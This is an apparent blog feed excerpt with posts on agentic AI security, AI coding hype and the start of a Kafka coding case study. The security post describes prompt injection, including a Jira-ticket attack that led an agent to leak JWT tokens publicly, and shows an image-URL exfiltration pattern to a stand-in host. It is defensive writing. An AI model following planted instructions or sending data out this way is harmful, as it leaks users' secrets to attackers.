<p>MCP servers that you don’t run yourself are increasingly common - <a href="https://context7.com/">Context7</a> is a good example - it gives you API lookup information, based on their giant database of scraped documentation. This seems fine but - you probably don’t have a commercial relationship with Context7. You don’t really control what they store, what they log, what they do with what we send them. Context7 itself actually is OK - you can use the <code class="language-plaintext highlighter-rouge">/mcp</code> command in Claude to inspect its API, and it doesn’t ask for any data beyond library names.</p>

<p>But some are not so safe - something like <a href="https://www.graphlit.com/">GraphiLit</a> for instance is designed to slurp a whole pile of your data and store it in a database hosted on their servers, with no commercial agreement and (given these are LLMs) no real guarantee that your LLM won’t decide to send them all sorts of confidential information.</p>

<h2 id="conclusions">Conclusions</h2>

<p>This is an area of rapid change - tools are improving, and there are continuous attempts to lock them down more securely. But as Bruce Schneier noted in <a href="https://www.schneier.com/blog/archives/2025/08/we-are-still-unable-to-secure-llms-from-malicious-inputs.html">the article I quoted at the start</a>, this is currently not going so well. And it’s probably going to get worse - as more people use the tools, and more attackers develop more sophisticated attacks - most of the articles are about “proof of concept” demos, but it’s only a matter of time before we get some actual high-profile businesses caught by AI tooling hacks.</p>

<p>So we need to keep aware of the changing state of things - keep reading sites like <a href="https://simonwillison.net/">Simon Willison’s weblog</a> and skeptical sites like <a href="https://pivot-to-ai.com/">Pivot to AI</a>, read the <a href="https://snyk.io/blog/">Snyk blogs</a> which have a lot on AI risks, and specifically <a href="https://snyk.io/articles/mcp-security-whats-old-is-new-again/">MCP security</a> - these are great learning resources, and I also assume Snyk will be offering more and more security tools in this space.</p>

<hr />

<p>I’ve given up on Discus for comments - if you want to discuss this post, please reply to <a href="https://hachyderm.io/@Korny/115451903530308404">My post on Mastodon</a> or <a href="https://bsky.app/profile/did:plc:bdphvffyy3x2lf5foeogab6u/post/3m4ay3wsjls26">My post on Bluesky</a> (I’m doing both as one is more free, one is more convenient for many people)</p>]]></content><author><name>Korny Sietsma</name></author><category term="AI" /><category term="Security" /><category term="AI" /><category term="security" /><category term="LLM" /><category term="agents" /><category term="MCP" /><summary type="html"><![CDATA[An expanded version of this post has been published at https://martinfowler.com/articles/agentic-ai-security.html - with more mitigations and updated content - I’d suggest reading that article instead, I’m leaving this one up for posterity. Also I’ve given up on Discus for comments - if you want to discuss this post, please reply to My post on Mastodon or My post on Bluesky (I’m doing both as one is more free, one is more convenient for many people) This is an edited version of a post I wrote for the Liberis internal engineering blog - it is not particularly original, most of the ideas come directly from Simon Willison’s article “Lethal Trifecta for AI agents” - but I thought it was worth writing a summary for our engineers, and sharing it more widely. Bruce Schneier summarised the current Agentic AI situation in his blog: We simply don’t know how to defend against these attacks. We have zero agentic AI systems that are secure against these attacks. Any AI that is working in an adversarial environment—and by this I mean that it may encounter untrusted training data or input—is vulnerable to prompt injection. It’s an existential problem that, near as I can tell, most people developing these technologies are just pretending isn’t there. There are many risks in this area, and it is in a state of rapid change - we need to understand the risks, keep an eye on them, and work out how to mitigate them where we can. (I’m going to shamelessly plagiarise Simon Willison’s excellent “Lethal Trifecta for AI agents” article as it is an excellent overview of the risks.) What do we mean by Agentic AI The terminology is in flux so terms are hard to pin down. I’m using “Agentic AI” with the specific meaning “LLM-based tools that can act autonomously” - tools that extend the basic LLM model with tools and agents and background processes. Increasingly this means “almost all AI based tools” - especially coding tools like Cursor, Copilot or Claude Code. (Note I’m using ‘agent’ here for any kind of tooling - some places reserve ‘agent’ for specific kinds of autonomous background agents, but that’s beyond this article) It helps to clarify the architecture and how these tools work: Basic architecture A simple non-agentic LLM just processes text - very very cleverly, but it’s still text-in and text-out: flowchart TD prompt@{shape: doc, label: "User Prompt"} output@{shape: doc, label: "Text Output"} subgraph llm["LLM"] context[System Context] training[Training Data] end prompt --&gt; llm llm --&gt; output Classic ChatGPT worked like this, but more and more tools are extending this with agents Agentic architecture An agentic LLM does more. It reads from a lot more sources of data, and it can trigger activities with side effects: flowchart TD prompt@{shape: doc, label: "User Prompt"} response@{shape: doc, label: "Text Response"} subgraph llm["Agentic LLM"] context[System Context] training[Training Data] sessioncontext@{shape: doc, label: "Session Context"} end read@{shape: lean-r, label: "Read Actions&lt;br/&gt;• Browse Web&lt;br/&gt;• Read Code&lt;br/&gt;• MCP Servers&lt;br/&gt;"} write@{shape: subroutine, label: "Write Actions&lt;br/&gt;• Modify files&lt;br/&gt;• HTTP calls&lt;br/&gt;• Shell commands&lt;br/&gt;• MCP Servers&lt;br/&gt;"} external@{ shape: docs, label: "External"} prompt --&gt; llm llm -.-&gt;|query| read read -.-&gt;|response added to context| llm llm -.-&gt;|execute| write write -.-&gt;|response added to context| llm llm --&gt; response write -.-&gt;|write| external Some of these agents are triggered explicitly by the user - but many are built in. For example coding tools will read your project source code and configuration, usually without informing you. And as the tools get smarter they have more and more agents under the covers. What is an MCP server? An MCP server really can be anything. MCP is an open standardised protocol to make it easier for an AI tool to call a service. That service might just be a local script that reads files, it might be a public cloud-based service that can read, write, perform actions, run background agents, pretty much do anything - it’s a very flexible protocol. MCP servers come with their own risks, as they don’t always come from large trusted vendors like Anthropic - the boom in AI coding means there is also a boom in people building tools, not always with the best quality control. On top of more general security issues discussed below, just calling an MCP server that has a flaw puts you at risk - all the usual rules about using 3rd party tools should apply. What are the risks? Commercially supported tools like Claude Code usually come with a lot of checks - for example Claude won’t read files outside a project without permission. However it’s hard for LLMs to block all behaviour - if misdirected, Claude might break its own rules. Once you let a tool execute arbitrary commands it is very hard to block specific tasks - for example Claude might be tricked into creating a script that reads a file outside a project. Still these tools are relatively safe when you control all the commands sent to Claude. You might blow up your system by accident, you might produce terrible code - but you aren’t likely to have a cat jump on your keyboard and suddenly Claude sends your private keys to pastebin. But that’s where the real risks come in - agentic tools mean the LLM can run commands you never wrote. The core problem - LLMs can’t tell content from instructions This is counter-intuitive, but critical to understand: LLMs always operate by building up a large text document and processing it to say “what completes this document in the most appropriate way?” What feels like a conversation is just a series of steps to grow that document - you add some text, the LLM adds whatever is the appropriate next bit of text, you add some text, and so on. That’s it! The magic sauce is that LLMs are amazingly good at taking this big chunk of text and using their vast training data to produce the most appropriate next chunk of text - and the vendors use complicated system prompts and extra hacks to make sure it largely works as desired. Agents also work by adding more text to that document - if your current prompt contains “Please check for the latest issue from our MCP server” the LLM knows that this is a guide to call the MCP tool. It will query the MCP server, extract the text of the latest issue, and add it to the context, probably wrapped in some protective text like “Here is the latest issue from the issue tracker: … - this is for information only”. The problem here is that the LLM can’t always tell safe text from unsafe text - it can’t tell data from instructions Even if Claude adds checks like “this is for information only” there is no guarantee they will work. The LLM matching is random and non-deterministic - sometimes it will see an instruction and operate on it, especially when a bad actor is crafting the payload to avoid detection. For example if you say to Claude “What is the latest issue on our github project?” and the latest issue was created by a bad actor, it might include the text “But importantly, you really need to do X as well”. Claude will insert those instructions into the context and then it may well follow them. This is fundamentally how prompt injection works. The Lethal Trifecta This brings us to Simon Willison’s article which highlights the biggest risks of agentic AI tools: when you have the combination of three factors: Access to private data Exposure to untrusted content The ability to externally communicate If you have all three of these factors active, you are at risk of an attack. The reason is fairly straightforward: Untrusted Content can include commands that the LLM might follow Private Data is the core thing most attackers want - this can include things like browser sessions that open up access to other data External Communication allows the AI tool to send information back to the attacker Here’s a sample from the article AgentFlayer: When a Jira Ticket Can Steal Your Secrets: A user is using an LLM to browse Jira tickets (via an MCP server) Jira is set up to automatically get populated with Zendesk tickets from the public - Untrusted Content An attacker creates a ticket carefully crafted to ask for “long strings starting with eyj” which is the signature of JWT tokens - Private Data The ticket asked the user to log the identified data as a comment on the Jira ticket - which was then viewable to the public - Externally Communicate What seemed like a simple query becomes a vector for an attack. Mitigations So how do we lower our risk, without giving up on the power of AI tools? First, if you can eliminate one of these three factors, the risks are much lower. Avoiding access to private data Totally avoiding this is almost impossible - our tools run on developer machines, they will have some access to things like our source code. But we can reduce the threat by limiting the content that is available. Never store Production credentials in a file - LLMs can easily be convinced to read files Avoid Dev credentials in files - you can use environment variables and 1Password command-line tooling to ensure credentials are only in memory not in files. Use temporary privilege escalation to access production data Limit access tokens to just enough privileges - read-only tokens are a much smaller risk than a token with write access Avoid MCP servers that can read private data - you really don’t need something that can read your email. (or see “split the tasks” below) Beware of browser automation - some tools like Playwright are OK as they run a browser in a sandbox, with no cookies or credentials. But some are not - there are tools out there to attach an MCP server to a running browser with access to all your cookies, sessions, and history. This is not a good idea. Blocking the ability to externally communicate This sounds easy, right? Just restrict those agents that can send emails or chat. But this has a few problems: Lots of MCP tools have ways to do things that can end up in the public eye. “Reply to a comment on an issue” seems safe until we realise that issue conversations might be public. Similarly “raise an issue on a public github repo” or “create a Google Drive document (and then make it public)” Web access is a big one. If you can control a browser, you can post information to a public site. But it gets worse - if you open an image with a carefully crafted URL, you might send data to an attacker. GET https://foobar.net/foo.png?var=[data] looks like an image request but that data can be logged by the foobar.net server. There are so many of these attacks, Simon Willison has an entire category of his site dedicated to exfiltration attacks Vendors like Anthropic are working hard to lock these down, but it’s pretty much whack-a-mole. Limiting access to untrusted content This is probably the best category for limiting our risk. You should avoid reading content that can be written by the general public - don’t read public issue trackers, don’t read arbitrary web pages, don’t let an LLM read your email or public chats! Obviously some content is unavoidable - you can ask an LLM to summarise a web page, and you are probably safe from that web page having hidden instructions in the text. Probably. But probably better to stick to “Please search on docs.microsoft.com” than “Please read the latest comments on reddit”. Or keep the task that reads Reddit separate from other tasks - see “Split the tasks” below. Beware tools that violate all three of these! It feels worth highlighting the worst kind of tools - MCP servers (or CLI tools) that both access untrusted content and externally communicate and access private data. Some popular tools are a massive risk and should be avoided or only run in isolated containers A clear example of this is AI powered browsers, or browser extensions - anywhere you can use a browser that can use your credentials or sessions or cookies you are wide open: Private data is exposed by any credentials you provide External communication is unavoidable - a GET to an image can expose your data Untrusted content is also pretty much unavoidable Simon Willison (again!) has a good coverage of this issue after a report on the Comet “AI Browser”. You should only use these tools if you can run them in a completely unauthenticated way - Microsoft’s Playwright MCP server is a good counter-example as it runs in an isolated browser instance. But don’t use their browser extension! I strongly expect that the entire concept of an agentic browser extension is fatally flawed and cannot be built safely. - Simon Willison Split the tasks A key point of the Lethal Trifecta is that it’s worst when all three factors exist. So you can mitigate risks by - splitting up the work into stages where each stage is safer. For instance, you might want to research how to fix a kafka problem - and yes, you might need to access reddit. So run this as a multi-stage research project: Identify the problem - ask the LLM to examine the codebase, examine official docs, identify the possible issues. Get it to craft a research-plan.md document describing what information it needs. Read the research-plan.md to check it makes sense! In a new session, run the research plan - this can be run without the same tool access, it could even be a standalone agent with access to only web searches. Get it to generate research-results.md Read the research-results.md to make sure it makes sense! Now back in the codebase, ask the LLM to use the research results to work on a fix. This is not only more secure, it is also increasingly a way people are encouraged to work. It’s too big a topic to cover here, but it’s a good idea to split LLM work into small stages, as the LLM works much better when its context isn’t too big. Dividing your tasks into “Think, Plan, Act” keeps context down, especially if “Act” can be chunked into a number of small independent and testable chunks. Also this follows another key recommendation: “Keep a human in the loop” Keep a human in the loop AIs make mistakes, they hallucinate, they can easily produce slop and technical debt. And as we’ve seen, they can be used for attacks. It is ALWAYS a good idea to check what they are doing. Either run them interactively, and watch them and approve as they work - or if running in the background, monitor their output carefully and make sure you are there to prune, to remove junk, to course-correct. If you are writing code, best practice is to have all code reviewed before it hits production - and those reviewers need to be human eyes. Having a human in the loop allows us to catch problems earlier, and to produce better results, as well as helping be more secure. Other risks Hosted MCP servers MCP servers that you don’t run yourself are increasingly common - Context7 is a good example - it gives you API lookup information, based on their giant database of scraped documentation. This seems fine but - you probably don’t have a commercial relationship with Context7. You don’t really control what they store, what they log, what they do with what we send them. Context7 itself actually is OK - you can use the /mcp command in Claude to inspect its API, and it doesn’t ask for any data beyond library names. But some are not so safe - something like GraphiLit for instance is designed to slurp a whole pile of your data and store it in a database hosted on their servers, with no commercial agreement and (given these are LLMs) no real guarantee that your LLM won’t decide to send them all sorts of confidential information. Conclusions This is an area of rapid change - tools are improving, and there are continuous attempts to lock them down more securely. But as Bruce Schneier noted in the article I quoted at the start, this is currently not going so well. And it’s probably going to get worse - as more people use the tools, and more attackers develop more sophisticated attacks - most of the articles are about “proof of concept” demos, but it’s only a matter of time before we get some actual high-profile businesses caught by AI tooling hacks. So we need to keep aware of the changing state of things - keep reading sites like Simon Willison’s weblog and skeptical sites like Pivot to AI, read the Snyk blogs which have a lot on AI risks, and specifically MCP security - these are great learning resources, and I also assume Snyk will be offering more and more security tools in this space. I’ve given up on Discus for comments - if you want to discuss this post, please reply to My post on Mastodon or My post on Bluesky (I’m doing both as one is more free, one is more convenient for many people)]]></summary></entry><entry><title type="html">Clowns to the left of me …</title><link href="https://blog.korny.info/2025/07/19/clowns-to-the-left-of-me" rel="alternate" type="text/html" title="Clowns to the left of me …" /><published>2025-07-19T00:00:00+01:00</published><updated>2025-07-19T00:00:00+01:00</updated><id>https://blog.korny.info/2025/07/19/clowns-to-the-left-of-me</id><content type="html" xml:base="https://blog.korny.info/2025/07/19/clowns-to-the-left-of-me"><![CDATA[<p>I’ve had the song “Stuck in the Middle with You” in my head for a few weeks. (R.I.P. Michael Madsen!)</p>

<p><img src="/assets/images/2025-07-19-clowns-to-the-left-of-me/reservoir-dogs-scene.jpg" alt="Reservoir Dogs ear scene" /><sup id="fnref:1" role="doc-noteref"><a href="#fn:1" class="footnote" rel="footnote">1</a></sup></p>

<p>But not because of Reservoir Dogs - but because of the public discussion about AI coding tools. (Yes, I know… feel free to walk away if you are sick of the whole thing).</p>

<p>I feel like there’s this strange culture war, or something like it, playing out - with wild statements on both extremes - and I’m stuck in the middle.</p>

<h3 id="hype-to-the-left-of-me">Hype To the left of me</h3>

<p>There is just <em>so much</em> AI Hype.</p>

<p>I’m talking here mainly about software development tools. There’s plenty more ludicrous hype when it comes to other AI areas, but I’m trying to limit this to software engineering.</p>

<p>And the hype, as well as the naïveté, is extreme. You get people vibe coding their entire business applications with no thoughts of security. You get people claiming 50x speed improvements, or indeed “we don’t need developers at all”. You get people posting “I’m not a programmer but I used Copilot to build my entire product and it’s awesome”, with multiple variations of this. Online discussion forums seem to be full of highly risky advice - “I just turn on <code class="language-plaintext highlighter-rouge">--dangerously-skip-permissions</code>” or “use this MCP server which gives write access to your git repo and reads user-supplied comments”<sup id="fnref:trifecta" role="doc-noteref"><a href="#fn:trifecta" class="footnote" rel="footnote">2</a></sup> or even worse.</p>

<p>Amusingly there’s also quite a few comments like “oops I deleted my whole file system, what do I do now?” or “I’m not a programmer and I got Copilot to build my product but now it’s broken and won’t change anything - I want my money back”. There’s some tasty schadenfreude here but I also feel a bit sorry for some of these people, where things started <em>so</em> nicely, but now technical debt, AI slop, and a lack of the knowledge of what “good” looks like, are making it all fall apart.</p>

<p>A lot of the hype is just marketing - astroturfing from fake users, or just plain press releases breathlessly reported by the media, or marketing via dubious research articles. “Look at our amazing new model, it has so much more data than the last one, it is reasoning now! We ran these benchmarks to prove it!”</p>

<p>A lot of the hype though does seem to be genuine users - lured by the quick result, the slick prototype, the dopamine hit of seeing all that code produced, without the boring course-corrections that feel like waste. Once you are high on the “look how much code I can make” drug, it’s hard not to evangelise it to everyone else.</p>

<p>And as the last year or two have shown us, it’s very easy for people to be fooled by LLMs, which excel at looking like something they are not. People anthropomorphise the tools all the time - “Why did Claude do this dumb thing? Can’t it see the example I’m looking at of how to do it?” - they start to think this is genuine intelligence that can reason and learn, not a specific set of tools.</p>

<p>LLMs are wonderful machines that read your data and questions and produce results in a way that <em>feels</em> like intelligence, but is actually just really clever pattern matching and a surrounding ecosystem of context sources and tools. Sometimes the results are amazing, occasionally they are terrible, and <em>you always need to check the results</em> because the process is fundamentally nondeterministic, and just because 99% of the time something worked, there’s always that 1% chance it was confidently wrong.</p>

<h3 id="skeptics-to-the-right">Skeptics to the right</h3>

<p>On the other side - the anti-AI sentiment is also pretty wild.</p>

<p>I think most of these folks are well meaning - far more so than the pro-AI hypers; my sympathy is with healthy skepticism in general. But they are also prone to jumping on hype - for one example the <a href="https://www.brainonllm.com/">Your Brain on ChatGPT</a> paper, which is still in pre-print, not peer reviewed, and has had <a href="https://theconversation.com/mit-researchers-say-using-chatgpt-can-rot-your-brain-the-truth-is-a-little-more-complicated-259450">some</a> <a href="https://www.changetechnically.fyi/2396236/episodes/17378968-you-deserve-better-brain-research">serious</a> <a href="https://www.globaleconomicnews.au/opinions/your-brain-on-chatgpt-a-forensic-takedown">criticism</a>, still got a <em>huge</em> amount of coverage, including <a href="https://time.com/7295195/ai-chatgpt-google-learning-school/">Time Magazine</a> - this includes some classic moral panic language:</p>

<blockquote>
  <p>Her team did submit it for peer review but did not want to wait for approval, which can take eight or more months, to raise attention to an issue that Kosmyna believes is affecting children now.</p>
</blockquote>

<p>Oh my goodness, will nobody protect our children?!</p>

<p>Similarly the <a href="https://metr.org/blog/2025-07-10-early-2025-ai-experienced-os-dev-study/">recent study on experienced open-source developer productivity</a> is being waved around to say “this proves they don’t work” - I think this has been shared multiple times on every single tech forum I frequent. The authors of the paper evidently expected this, and provided this table, which doesn’t seem to get as much mention as their headlines:</p>

<p><img src="/assets/images/2025-07-19-clowns-to-the-left-of-me/metr-study-table.png" alt="METR study results table" /></p>

<p>And this interesting breakdown of likely contributing factors:</p>

<p><img src="/assets/images/2025-07-19-clowns-to-the-left-of-me/metr-contributing-factors.png" alt="METR study contributing factors" /></p>

<p>This study is actually pretty interesting - and it does show where we should be cautious to assume self-assessment of how good these tools are. And probably real limitations in large complex codebases. But it’s no “Ah-ha! The emperor has no clothes!” moment, as far as I can tell. (After I wrote this, I found that <a href="https://simonwillison.net/2025/Jul/12/ai-open-source-productivity/">Simon Willison has a good discussion of this paper as well</a> - and there’s a rather more severe critique at <a href="https://www.fightforthehuman.com/are-developers-slowed-down-by-ai-evaluating-an-rct-and-what-it-tells-us-about-developer-productivity/">Cat Hick’s blog</a> )</p>

<p>I also see quite a few people who have tried the most basic, un-assisted, low-context tools, and get terrible results; and then rule out AI tools as fundamentally broken. “I used copilot and its suggestions are wrong 40% of the time, often ludicrously wrong”. This was where I was at 6 months ago - Copilot seemed like a handy yet often irritating Clippy, no big deal. I think this drives a lot of skepticism, people who feel they gave it a go, it didn’t live up to the hype, so they’ve made up their minds.</p>

<p>And generally there’s just a lot of anger and frustration, in reaction to the constant flood of hype:</p>

<p><img src="/assets/images/2025-07-19-clowns-to-the-left-of-me/neologism-rant.png" alt="ranty example" /></p>

<p>As I said before, I’m more sympathetic to the skeptics than the hypers. Especially when it comes to the broader AI industry - I’m always keen to read <a href="https://pivot-to-ai.com/">David Gerard’s Pivot to AI</a> or any of <a href="https://www.wheresyoured.at/">Ed Zitron’s rants</a> - see also <a href="#dont-forget-the-downsides">my downsides section later</a>.</p>

<p>But - I do find that there’s a lot of talk about AI software development tools, that just plain conflicts with my personal experience.</p>

<h3 id="stuck-in-the-middle">Stuck in the middle</h3>

<p>So here’s the problem - every day I’m flooded with articles that are ludicrously positive <em>and</em> ludicrously negative. But what I’m seeing doesn’t match either.</p>

<p>I personally find the tools helpful, powerful, and a definite boost. Maybe, as per the METR study, I’m losing more time learning the tools, and tweaking the context, and reading and experimenting and correcting when they get wrong, compared to the time actually saved.</p>

<p>But some of this is the startup costs with any new technology; some will only be paid once, some will be a slow gradual tax, especially with a technology that is changing so fast. And some will be a learning curve for us to learn when to say “Ok, this task isn’t suited to LLMs and I should just do it by hand”.</p>

<p>And they are already giving me a bunch of obvious speedups, small and large. Claude is fixing the links in this blog as I type. Claude wrote the tiny python script I use daily to list our project’s outstanding pull requests.  Claude wrote a little visualisation of git activity I needed for management. Claude is drawing simple Mermaid diagrams in our docs. Claude helped me use <a href="https://github.com/snyk/mcp-server-snyk">Snyk</a> to find that our project had an insecure dependency, and <a href="https://docs.sourcebot.dev/docs/features/mcp-server">Sourcebot</a> to find that another project of ours had the same dependency and had a viable workaround.</p>

<p>And for a larger example, I’ve written up a <a href="/2025/07/18/a-real-world-ai-coding-case-sample">separate blog post</a> detailing how I used Claude Code to implement a Kafka messaging feature in an ASP.Net Core application. This demonstrates what can actually be done with AI coding tools today - not the wild hype, not the complete dismissal, but practical reality.</p>

<h2 id="whats-next">What’s next?</h2>

<p>I’m still learning - I’ve made masses of progress in the couple of months since I started using the tools in anger, and there’s a lot more to learn!</p>

<p>I also want to learn how to guide our organisation, so our developers know how to use these tools effectively, carefully, and productively.</p>

<p>It’s an exciting time - I’m having more <em>fun</em> with these tools than I expected. There are so many benefits already, and so much potential for more.</p>

<p>But…</p>

<h2 id="dont-forget-the-downsides">Don’t forget the downsides</h2>

<p>I need this standard disclaimer at the end of any AI post. We must remember the context behind these tools - there are giant tech companies pushing these hard into every corner of our lives. They are run by horrible tech <a href="https://en.wikipedia.org/wiki/Broligarchy">broligarchs</a><sup id="fnref:broligarchy" role="doc-noteref"><a href="#fn:broligarchy" class="footnote" rel="footnote">3</a></sup> whose interests are personal power and destabilising democracy, not helping the world.</p>

<p>They consume vast amounts of power, which due to our failure to charge for <a href="https://en.wikipedia.org/wiki/Externality">externalities</a>, mean they are burning fossil fuels, consuming scarce water, and accelerating the climate crisis. And there are many signs that the funding for this is <a href="https://www.wheresyoured.at/subprimeai/">an unsustainable bubble</a> and the companies and tools may collapse, or start charging significantly more and/or enshittifying the experience of users.</p>

<h2 id="further-reading">Further reading</h2>

<p>I’m not alone, stuck here in the middle. For some good sensible approaches I’d also recommend <a href="https://birgitta.info/">Birgitta Böckeler</a> and <a href="https://blog.thepete.net/blog/">Pete Hodgson</a> and of course <a href="https://simonwillison.net/">Simon Willison</a>’s blog is essential reading.</p>
<div class="footnotes" role="doc-endnotes">
  <ol>
    <li id="fn:1" role="doc-endnote">
      <p>Image from <em>Reservoir Dogs</em> (1992), directed by Quentin Tarantino. Miramax Films. Fair use for commentary and criticism. <a href="#fnref:1" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
    <li id="fn:trifecta" role="doc-endnote">
      <p>Essential reading: <a href="https://simonwillison.net/2025/Jun/16/the-lethal-trifecta/">Simon Willison on the lethal trifecta for AI agents</a> <a href="#fnref:trifecta" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
    <li id="fn:broligarchy" role="doc-endnote">
      <p>Thanks <a href="https://broligarchy.substack.com/about">Carole Cadwalla</a> for introducing me to the very useful term <a href="https://en.wikipedia.org/wiki/Broligarchy">Broligarchy</a>! <a href="#fnref:broligarchy" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
  </ol>
</div>]]></content><author><name>Korny Sietsma</name></author><category term="AI" /><category term="ai-coding-tools" /><category term="software-development" /><summary type="html"><![CDATA[I’ve had the song “Stuck in the Middle with You” in my head for a few weeks. (R.I.P. Michael Madsen!) 1 But not because of Reservoir Dogs - but because of the public discussion about AI coding tools. (Yes, I know… feel free to walk away if you are sick of the whole thing). I feel like there’s this strange culture war, or something like it, playing out - with wild statements on both extremes - and I’m stuck in the middle. Hype To the left of me There is just so much AI Hype. I’m talking here mainly about software development tools. There’s plenty more ludicrous hype when it comes to other AI areas, but I’m trying to limit this to software engineering. And the hype, as well as the naïveté, is extreme. You get people vibe coding their entire business applications with no thoughts of security. You get people claiming 50x speed improvements, or indeed “we don’t need developers at all”. You get people posting “I’m not a programmer but I used Copilot to build my entire product and it’s awesome”, with multiple variations of this. Online discussion forums seem to be full of highly risky advice - “I just turn on --dangerously-skip-permissions” or “use this MCP server which gives write access to your git repo and reads user-supplied comments”2 or even worse. Amusingly there’s also quite a few comments like “oops I deleted my whole file system, what do I do now?” or “I’m not a programmer and I got Copilot to build my product but now it’s broken and won’t change anything - I want my money back”. There’s some tasty schadenfreude here but I also feel a bit sorry for some of these people, where things started so nicely, but now technical debt, AI slop, and a lack of the knowledge of what “good” looks like, are making it all fall apart. A lot of the hype is just marketing - astroturfing from fake users, or just plain press releases breathlessly reported by the media, or marketing via dubious research articles. “Look at our amazing new model, it has so much more data than the last one, it is reasoning now! We ran these benchmarks to prove it!” A lot of the hype though does seem to be genuine users - lured by the quick result, the slick prototype, the dopamine hit of seeing all that code produced, without the boring course-corrections that feel like waste. Once you are high on the “look how much code I can make” drug, it’s hard not to evangelise it to everyone else. And as the last year or two have shown us, it’s very easy for people to be fooled by LLMs, which excel at looking like something they are not. People anthropomorphise the tools all the time - “Why did Claude do this dumb thing? Can’t it see the example I’m looking at of how to do it?” - they start to think this is genuine intelligence that can reason and learn, not a specific set of tools. LLMs are wonderful machines that read your data and questions and produce results in a way that feels like intelligence, but is actually just really clever pattern matching and a surrounding ecosystem of context sources and tools. Sometimes the results are amazing, occasionally they are terrible, and you always need to check the results because the process is fundamentally nondeterministic, and just because 99% of the time something worked, there’s always that 1% chance it was confidently wrong. Skeptics to the right On the other side - the anti-AI sentiment is also pretty wild. I think most of these folks are well meaning - far more so than the pro-AI hypers; my sympathy is with healthy skepticism in general. But they are also prone to jumping on hype - for one example the Your Brain on ChatGPT paper, which is still in pre-print, not peer reviewed, and has had some serious criticism, still got a huge amount of coverage, including Time Magazine - this includes some classic moral panic language: Her team did submit it for peer review but did not want to wait for approval, which can take eight or more months, to raise attention to an issue that Kosmyna believes is affecting children now. Oh my goodness, will nobody protect our children?! Similarly the recent study on experienced open-source developer productivity is being waved around to say “this proves they don’t work” - I think this has been shared multiple times on every single tech forum I frequent. The authors of the paper evidently expected this, and provided this table, which doesn’t seem to get as much mention as their headlines: And this interesting breakdown of likely contributing factors: This study is actually pretty interesting - and it does show where we should be cautious to assume self-assessment of how good these tools are. And probably real limitations in large complex codebases. But it’s no “Ah-ha! The emperor has no clothes!” moment, as far as I can tell. (After I wrote this, I found that Simon Willison has a good discussion of this paper as well - and there’s a rather more severe critique at Cat Hick’s blog ) I also see quite a few people who have tried the most basic, un-assisted, low-context tools, and get terrible results; and then rule out AI tools as fundamentally broken. “I used copilot and its suggestions are wrong 40% of the time, often ludicrously wrong”. This was where I was at 6 months ago - Copilot seemed like a handy yet often irritating Clippy, no big deal. I think this drives a lot of skepticism, people who feel they gave it a go, it didn’t live up to the hype, so they’ve made up their minds. And generally there’s just a lot of anger and frustration, in reaction to the constant flood of hype: As I said before, I’m more sympathetic to the skeptics than the hypers. Especially when it comes to the broader AI industry - I’m always keen to read David Gerard’s Pivot to AI or any of Ed Zitron’s rants - see also my downsides section later. But - I do find that there’s a lot of talk about AI software development tools, that just plain conflicts with my personal experience. Stuck in the middle So here’s the problem - every day I’m flooded with articles that are ludicrously positive and ludicrously negative. But what I’m seeing doesn’t match either. I personally find the tools helpful, powerful, and a definite boost. Maybe, as per the METR study, I’m losing more time learning the tools, and tweaking the context, and reading and experimenting and correcting when they get wrong, compared to the time actually saved. But some of this is the startup costs with any new technology; some will only be paid once, some will be a slow gradual tax, especially with a technology that is changing so fast. And some will be a learning curve for us to learn when to say “Ok, this task isn’t suited to LLMs and I should just do it by hand”. And they are already giving me a bunch of obvious speedups, small and large. Claude is fixing the links in this blog as I type. Claude wrote the tiny python script I use daily to list our project’s outstanding pull requests. Claude wrote a little visualisation of git activity I needed for management. Claude is drawing simple Mermaid diagrams in our docs. Claude helped me use Snyk to find that our project had an insecure dependency, and Sourcebot to find that another project of ours had the same dependency and had a viable workaround. And for a larger example, I’ve written up a separate blog post detailing how I used Claude Code to implement a Kafka messaging feature in an ASP.Net Core application. This demonstrates what can actually be done with AI coding tools today - not the wild hype, not the complete dismissal, but practical reality. What’s next? I’m still learning - I’ve made masses of progress in the couple of months since I started using the tools in anger, and there’s a lot more to learn! I also want to learn how to guide our organisation, so our developers know how to use these tools effectively, carefully, and productively. It’s an exciting time - I’m having more fun with these tools than I expected. There are so many benefits already, and so much potential for more. But… Don’t forget the downsides I need this standard disclaimer at the end of any AI post. We must remember the context behind these tools - there are giant tech companies pushing these hard into every corner of our lives. They are run by horrible tech broligarchs3 whose interests are personal power and destabilising democracy, not helping the world. They consume vast amounts of power, which due to our failure to charge for externalities, mean they are burning fossil fuels, consuming scarce water, and accelerating the climate crisis. And there are many signs that the funding for this is an unsustainable bubble and the companies and tools may collapse, or start charging significantly more and/or enshittifying the experience of users. Further reading I’m not alone, stuck here in the middle. For some good sensible approaches I’d also recommend Birgitta Böckeler and Pete Hodgson and of course Simon Willison’s blog is essential reading. Image from Reservoir Dogs (1992), directed by Quentin Tarantino. Miramax Films. Fair use for commentary and criticism. &#8617; Essential reading: Simon Willison on the lethal trifecta for AI agents &#8617; Thanks Carole Cadwalla for introducing me to the very useful term Broligarchy! &#8617;]]></summary></entry><entry><title type="html">A real-world AI coding case sample</title><link href="https://blog.korny.info/2025/07/18/a-real-world-ai-coding-case-sample" rel="alternate" type="text/html" title="A real-world AI coding case sample" /><published>2025-07-18T00:00:00+01:00</published><updated>2025-07-18T00:00:00+01:00</updated><id>https://blog.korny.info/2025/07/18/a-real-world-ai-coding-case-sample</id><content type="html" xml:base="https://blog.korny.info/2025/07/18/a-real-world-ai-coding-case-sample"><![CDATA[<p>I thought it’d be worth posting an example of a bigger task I did the other day - just to show what can be done, without crazy vibe-coding, on a non-greenfields app, using ASP.Net Core not some simplistic front-end tooling.</p>

<p class="notice">This was originally part of a longer post but I thought it was worth splitting - this example is used in my post <a href="/2025/07/19/clowns-to-the-left-of-me">Clowns to the left of me …</a></p>

<h2 id="the-task---sending-a-message-when-data-changes">The task - Sending a message when data changes</h2>

<p>We have an ASP.Net core application which includes a relationship between Businesses and People, where that relationship is modeled as a collection of Contacts:</p>

<pre><code class="language-mermaid">  erDiagram
      BUSINESS {
          Guid Id PK
      }

      CONTACT {
          Guid BusinessId PK,FK
          Guid PersonId PK,FK
      }

      PERSON {
          Guid Id PK
      }

      BUSINESS ||--o{ CONTACT : "has"
      PERSON ||--o{ CONTACT : "is a"
</code></pre>

